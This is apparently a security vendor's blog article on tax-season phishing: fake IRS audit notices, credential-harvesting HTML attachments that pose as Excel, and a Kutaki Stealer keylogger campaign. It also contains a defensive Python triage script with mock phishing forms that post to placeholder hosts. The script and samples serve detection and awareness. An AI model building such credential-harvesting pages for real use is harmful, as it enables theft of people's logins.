Tax season always brings an increased risk of fraud for both tax professionals and individuals. Any taxpayer could be a target of cybercrooks who use a variety of tactics, including email and phone, to trick users into handing over credentials, PINs, and other sensitive information.
Did you know?
In 2023, the IRS received 294,138 complaints of tax-related identity theft from taxpayers. Victims had to wait an average of 19 months for the agency to process and send their refunds.
Some of the most convincing and successful scams during tax filing season rely on a couple of factors that leave people more vulnerable or susceptible to them.
This includes:
While we’ve already tackled some of the scam scenarios individuals can expect this year, researchers at Bitdefender Antispam Lab have remained vigilant for email-based schemes targeting taxpayers and tax professionals this week.
In many tax scams, fraudsters impersonate IRS agents and government employees. For about a week now, antispam researchers have noticed a wave of tax audit scams meant to steal login credentials and take over accounts.
In the sample below, fraudsters warn of an in-person audit at the place of business and ask the recipient to download documents to prepare for the “tax audit team” visit.
The link embedded in the email directs users to a fake WeTransfer page where individuals need to fill out their credentials.
Although IRS audits are nothing new, and they don’t necessarily suggest a problem with the accounts of an individual or an organization, the message could panic an unaware individual into “downloading” the “Tax Demand Notice” and handing over login credentials to scammers.
It’s crucial to note that the IRS will initially notify individuals of an audit via mail only. A written request should contain a list of specific records that the IRS would like to review. Further instructions on how the agency will conduct the audit and contact information should also be enclosed in the letter. The IRS will never initiate an audit via telephone.
Legitimate and official audit requests should always arrive via an official letter in the mail.
Tax season can be a stressful time for all taxpayers who may unwittingly interact with fraudulent correspondence that seems to originate from the government revenue service.
In another scam campaign spotted by Bitdefender researchers, fraudsters bait recipients with fake attachments that purportedly contain a tax certificate.
A tax certificate is a very important document issued by a revenue service agency and serves as evidence of tax payments and compliance with local tax regulations. The HTML attachment directs recipients to a fake Excel page that requires them to fill out their email address, password and phone numbers.
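For mail administrators triaging attachments like the one described above, a static check can flag HTML files that ask for a password and post it to a remote host, or that immediately redirect off the local file. This is an added example, not Bitdefender's detection logic; the sample attachments and the `example.invalid` hosts are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class AttachmentTriage(HTMLParser):
    """Collects credential-harvesting indicators from an HTML attachment."""
    def __init__(self):
        super().__init__()
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input":
            itype = a.get("type", "").lower()
            if itype == "password":
                self.findings.add("password-field")
            elif itype in ("email", "tel"):
                self.findings.add("contact-field")
        elif tag == "form":
            # An absolute action URL means the data leaves the local file.
            host = urlparse(a.get("action", "")).netloc
            if host:
                self.findings.add("remote-form-action:" + host.lower())
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; url=https://host/path"
            _, _, target = a.get("content", "").partition("=")
            host = urlparse(target.strip(" '\"")).netloc
            if host:
                self.findings.add("meta-refresh:" + host.lower())

def triage(html_text):
    """Return (suspicious, sorted findings) for one attachment body."""
    parser = AttachmentTriage()
    parser.feed(html_text)
    parser.close()
    f = parser.findings
    harvest = "password-field" in f and any(
        x.startswith("remote-form-action:") for x in f)
    redirect = any(x.startswith("meta-refresh:") for x in f)
    return (harvest or redirect), sorted(f)

# Constructed samples (not taken from the campaign described in the article).
SAMPLE_FORM = """<html><body><form action="https://collect.example.invalid/post">
<input type="email" name="e"><input type="password" name="p"/>
<input type="tel" name="t"></form></body></html>"""
SAMPLE_REDIRECT = """<html><head><meta http-equiv="Refresh"
content="0; url=https://sheets.example.invalid/view?id=1"></head></html>"""
SAMPLE_BENIGN = '<form action="/search"><input type="text" name="q"></form>'

if __name__ == "__main__":
    for name in ("SAMPLE_FORM", "SAMPLE_REDIRECT", "SAMPLE_BENIGN"):
        print(name, triage(globals()[name]))
```

A hit is a reason to quarantine the message for review, not a verdict: obfuscated or script-built pages will evade a static pass like this.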
In another version of the scam, fraudsters impersonate a legitimate IRS-registered tax preparer to steal credentials.
Nothing stings worse than having your personal or work device compromised by cybercriminals during tax season. Bitdefender researchers have also spotted a phishing campaign that aimed to infect recipients’ devices with Kutaki Stealer.
Kutaki is a keylogger with info-stealing capabilities, including capturing user credentials, keystrokes and mouse movements, and exfiltrating the data to the attackers.
The cybercriminals behind this campaign baited users with malicious attachments that allegedly contained details regarding a failed payment towards taxes. While the wording of the email might seem a bit off, the thought of facing additional payments or penalties could be enough to persuade even the most cautious of recipients to act.
Tax season gives fraudsters the perfect backdrop to conduct highly successful schemes against individuals, businesses, and even professional tax preparers.
Despite a slew of tactics and delivery methods for tax season scams, there are easy ways to stay safe from these fraud attempts.
Staying informed about the latest scam tactics and maintaining a skeptical mindset can be a very effective shield against any scam. If you know how to identify potential malicious activity, you can stay ahead of scammers who continuously adapt their ruses. It’s important to get rid of that “won’t happen to me” attitude and know that anyone, even the savviest individual, can be deceived by a scammer.
The bottom line:
When in doubt, ask Bitdefender Scamio, our AI-powered scam detector. Scamio helps you determine in minutes whether any unsolicited correspondence is a potential scam. Describe the situation to Scamio, send a link, text or screenshot. Scamio will analyze the information and respond. You can access Scamio for free on any device or operating system via your web browser or Facebook Messenger.
Note: This article is based on spam samples and analysis provided by our dedicated Bitdefender Labs researchers Viorel Zavoiu and Victor Vrabie.
Alina is a history buff passionate about cybersecurity and anything sci-fi, advocating Bitdefender technologies and solutions. She spends most of her time between her two feline friends and traveling.